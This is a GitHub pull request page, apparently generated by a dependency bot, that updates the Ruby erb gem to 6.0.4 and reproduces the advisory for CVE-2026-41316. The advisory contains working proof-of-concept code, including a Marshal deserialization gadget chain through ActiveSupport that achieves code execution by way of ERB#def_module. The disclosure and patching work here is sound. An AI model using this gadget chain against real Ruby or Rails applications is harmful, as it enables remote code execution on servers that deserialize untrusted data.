Skip to content

Update dependency erb to v6.0.4 [SECURITY]#640

Merged
Taucher2003 merged 1 commit intomainfrom
renovate/rubygems-erb-vulnerability
Apr 24, 2026
Merged

Update dependency erb to v6.0.4 [SECURITY]#640
Taucher2003 merged 1 commit intomainfrom
renovate/rubygems-erb-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Apr 24, 2026

This PR contains the following updates:

Package Change Age Adoption Passing Confidence Diffend
erb 6.0.36.0.4 age adoption passing confidence Diff

ERB has an @​_init deserialization guard bypass via def_module / def_method / def_class

CVE-2026-41316 / GHSA-q339-8rmv-2mhv

More information

Details

Summary

Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an @_init instance variable guard in ERB#result and ERB#run to prevent code execution when an ERB object is reconstructed via Marshal.load (deserialization). However, three other public methods that also evaluate @src via eval() were not given the same guard:

  • ERB#def_method
  • ERB#def_module
  • ERB#def_class

An attacker who can trigger Marshal.load on untrusted data in a Ruby application that has erb loaded can use ERB#def_module (zero-arg, default parameters) as a code execution sink, bypassing the @_init protection entirely.

Details
The @​_init Guard

In ERB#initialize, the guard is set:

##### erb.rb line 838
@​_init = self.class.singleton_class

In ERB#result and ERB#run, the guard is checked before eval(@​src):

##### erb.rb line 1008-1012
def result(b=new_toplevel)
  unless @​_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  eval(@​src, b, (@​filename || '(erb)'), @​lineno)
end

When an ERB object is reconstructed via Marshal.load, @_init is either nil (not set during marshal reconstruction) or an attacker-controlled value. Since ERB.singleton_class cannot be marshaled, the attacker cannot set @_init to the correct value, and result/run correctly refuse to execute.

The Bypass

ERB#def_method, ERB#def_module, and ERB#def_class all reach eval(@​src) without checking @_init:

##### erb.rb line 1088-1093
def def_method(mod, methodname, fname='(ERB)')
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)      # <-- no @&#8203;_init check
  end
end

##### erb.rb line 1113-1117
def def_module(methodname='erb')       # <-- zero-arg call possible
  mod = Module.new
  def_method(mod, methodname, @&#8203;filename || '(ERB)')
  mod
end

##### erb.rb line 1170-1174
def def_class(superklass=Object, methodname='result')  # <-- zero-arg call possible
  cls = Class.new(superklass)
  def_method(cls, methodname, @&#8203;filename || '(ERB)')
  cls
end

def_module and def_class accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.

Method wrapper breakout

def_method wraps @src in a method definition: "def erb\n" + @&#8203;src + "\nend\n". Code inside a method body only executes when the method is called, not when it's defined. However, by setting @src to begin with end\n, the attacker closes the method definition early. Code after the first end executes immediately at module_eval time:

##### Attacker sets @&#8203;src = "end\nsystem('id')\ndef x"
##### After def_method transformation, module_eval receives:

#
#####   def erb

#####   end
#####   system('id')    <- executes at eval time

#####   def x
#####   end
Proof of Concept
Minimal (ERB only)
require 'erb'

erb = ERB.allocate
erb.instance_variable_set(:@&#8203;src, "end\nsystem('id')\ndef x")
erb.instance_variable_set(:@&#8203;lineno, 0)

##### ERB#result correctly blocks this:
begin
  erb.result
rescue ArgumentError => e
  puts "result: #{e.message} (blocked by @&#8203;_init -- correct)"
end

##### ERB#def_module does NOT block this -- executes system('id'):
erb.def_module

##### Output: uid=0(root) gid=0(root) groups=0(root)
Marshal deserialization (ERB + ActiveSupport)

When combined with ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy as a method dispatch gadget, this achieves RCE via Marshal.load:

require 'active_support'
require 'active_support/deprecation'
require 'active_support/deprecation/proxy_wrappers'
require 'erb'

##### --- Build payload (replace proxy class for marshaling) ---
real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy
ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
class ActiveSupport::Deprecation
  class DeprecatedInstanceVariableProxy
    def initialize(h)
      h.each { |k, v| instance_variable_set(k, v) }
    end
  end
end

erb = ERB.allocate
erb.instance_variable_set(:@&#8203;src, "end\nsystem('id')\ndef x")
erb.instance_variable_set(:@&#8203;lineno, 0)
erb.instance_variable_set(:@&#8203;filename, nil)

proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({
  :@&#8203;instance => erb,
  :@&#8203;method => :def_module,
  :@&#8203;var => "@&#8203;x",
  :@&#8203;deprecator => Kernel
})

marshaled = Marshal.dump({proxy => 0})

##### --- Restore real class and trigger ---
ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)
ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)

##### This triggers RCE:
Marshal.load(marshaled)

##### Output: uid=0(root) gid=0(root) groups=0(root)

Chain:

  1. Marshal.load reconstructs a Hash with a DeprecatedInstanceVariableProxy as key
  2. Hash key insertion calls .hash on the proxy
  3. .hash is undefined -> method_missing(:hash) -> dispatches to ERB#def_module
  4. def_module -> def_method -> module_eval(eval(src)) -> breakout -> system('id')

Verified on: Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1

Impact
Scope

Any Ruby application that calls Marshal.load on untrusted data AND has both erb and activesupport loaded is vulnerable to arbitrary code execution. This includes:

  • Ruby on Rails applications that import untrusted serialized data -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
  • Ruby tools that import untrusted serialized data -- any tool using Marshal.load for caching, data import, or IPC
  • Legacy Rails apps (pre-7.0) that still use Marshal for cookie session serialization
Severity justification

The @_init guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The def_module bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.

This bypass renders the @​_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.

Details
Gadget chain history

Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:

Year Chain Mitigated in
2018 Gem::Requirement (Luke Jahnke) RubyGems 3.0
2021 UDG -- TarReader+WriteAdapter (vakzz) RubyGems 3.1
2022 Gem::Specification._load (vakzz) RubyGems 3.6
2024 UncaughtThrowError (Luke Jahnke) Ruby 3.4 patches
2024 Gem::Source::Git#rev_parse RubyGems 3.6
2026 ERB#def_module @​_init bypass ERB 6.0.4
Patches

The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.

  • ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4
Details

Add the @_init check to def_method. Since def_module and def_class both delegate to def_method, this single change covers all three bypass paths:

def def_method(mod, methodname, fname='(ERB)')
  unless @&#8203;_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)
  end
end

Severity

  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies This updates dependency files label Apr 24, 2026
@github-actions
Copy link
Copy Markdown

github-actions Bot commented Apr 24, 2026

GitLab Pipeline Action

General information

Link to pipeline: https://gitlab.com/code0-tech/development/reticulum/-/pipelines/2477853001

Status: Passed
Duration: 16 minutes

Job summaries

docs:preview

Documentation preview available at https://code0-tech.gitlab.io/-/development/telescopium/-/jobs/14080704940/artifacts/out/index.html

generate-environment

RETICULUM_CONTAINER_VERSION=0.0.0-experimental-2477853001-24d37f073337f2c78fb54a0ce349cc0e50265b01

@Taucher2003 Taucher2003 merged commit ff75d82 into main Apr 24, 2026
1 check passed
@Taucher2003 Taucher2003 deleted the renovate/rubygems-erb-vulnerability branch April 24, 2026 21:35
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@Taucher2003 Taucher2003 Taucher2003 approved these changes

Assignees

@Taucher2003 Taucher2003

Labels

dependencies This updates dependency files

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@Taucher2003